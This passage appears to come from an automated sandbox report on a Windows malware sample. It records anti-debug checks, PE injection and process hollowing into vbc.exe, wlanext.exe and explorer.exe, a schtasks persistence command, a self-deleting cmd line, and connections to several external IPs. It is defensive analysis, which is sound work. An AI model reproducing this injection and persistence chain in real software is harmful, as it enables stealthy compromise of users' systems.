Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]		10_2_02EA99BF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F069A6 mov eax, dword ptr fs:[00000030h]		10_2_02F069A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAC182 mov eax, dword ptr fs:[00000030h]		10_2_02EAC182
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBA185 mov eax, dword ptr fs:[00000030h]		10_2_02EBA185
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB2990 mov eax, dword ptr fs:[00000030h]		10_2_02EB2990
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8C962 mov eax, dword ptr fs:[00000030h]		10_2_02E8C962
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8B171 mov eax, dword ptr fs:[00000030h]		10_2_02E8B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8B171 mov eax, dword ptr fs:[00000030h]		10_2_02E8B171
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAB944 mov eax, dword ptr fs:[00000030h]		10_2_02EAB944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAB944 mov eax, dword ptr fs:[00000030h]		10_2_02EAB944
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]		10_2_02EA4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]		10_2_02EA4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]		10_2_02EA4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]		10_2_02EA4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EA4120 mov ecx, dword ptr fs:[00000030h]		10_2_02EA4120
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB513A mov eax, dword ptr fs:[00000030h]		10_2_02EB513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB513A mov eax, dword ptr fs:[00000030h]		10_2_02EB513A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89100 mov eax, dword ptr fs:[00000030h]		10_2_02E89100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89100 mov eax, dword ptr fs:[00000030h]		10_2_02E89100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E89100 mov eax, dword ptr fs:[00000030h]		10_2_02E89100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB16E0 mov ecx, dword ptr fs:[00000030h]		10_2_02EB16E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E976E2 mov eax, dword ptr fs:[00000030h]		10_2_02E976E2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F58ED6 mov eax, dword ptr fs:[00000030h]		10_2_02F58ED6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB36CC mov eax, dword ptr fs:[00000030h]		10_2_02EB36CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC8EC7 mov eax, dword ptr fs:[00000030h]		10_2_02EC8EC7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F3FEC0 mov eax, dword ptr fs:[00000030h]		10_2_02F3FEC0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F50EA5 mov eax, dword ptr fs:[00000030h]		10_2_02F50EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F50EA5 mov eax, dword ptr fs:[00000030h]		10_2_02F50EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F50EA5 mov eax, dword ptr fs:[00000030h]		10_2_02F50EA5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F046A7 mov eax, dword ptr fs:[00000030h]		10_2_02F046A7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F1FE87 mov eax, dword ptr fs:[00000030h]		10_2_02F1FE87
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E9766D mov eax, dword ptr fs:[00000030h]		10_2_02E9766D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]		10_2_02EAAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]		10_2_02EAAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]		10_2_02EAAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]		10_2_02EAAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]		10_2_02EAAE73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]		10_2_02E97E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]		10_2_02E97E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]		10_2_02E97E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]		10_2_02E97E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]		10_2_02E97E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]		10_2_02E97E41
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4AE44 mov eax, dword ptr fs:[00000030h]		10_2_02F4AE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F4AE44 mov eax, dword ptr fs:[00000030h]		10_2_02F4AE44
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8E620 mov eax, dword ptr fs:[00000030h]		10_2_02E8E620
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F3FE3F mov eax, dword ptr fs:[00000030h]		10_2_02F3FE3F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8C600 mov eax, dword ptr fs:[00000030h]		10_2_02E8C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8C600 mov eax, dword ptr fs:[00000030h]		10_2_02E8C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02E8C600 mov eax, dword ptr fs:[00000030h]		10_2_02E8C600
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EB8E00 mov eax, dword ptr fs:[00000030h]		10_2_02EB8E00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBA61C mov eax, dword ptr fs:[00000030h]		10_2_02EBA61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EBA61C mov eax, dword ptr fs:[00000030h]		10_2_02EBA61C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F41608 mov eax, dword ptr fs:[00000030h]		10_2_02F41608
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02EC37F5 mov eax, dword ptr fs:[00000030h]		10_2_02EC37F5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F07794 mov eax, dword ptr fs:[00000030h]		10_2_02F07794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F07794 mov eax, dword ptr fs:[00000030h]		10_2_02F07794
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 10_2_02F07794 mov eax, dword ptr fs:[00000030h]		10_2_02F07794

Enables debug privileges

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 149.202.23.211 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.38.251.204 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.88.202.115 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 99.83.185.45 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.105.124.225 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 216.10.246.131 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.13.175 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.20.127.61 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\JAAkR51fQY.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: AC0000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: A3F008			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000005.00000000.231629035.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.233022311.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.248469963.0000000006860000.00000004.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.233022311.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.233022311.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Users\user\Desktop\JAAkR51fQY.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\JAAkR51fQY.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
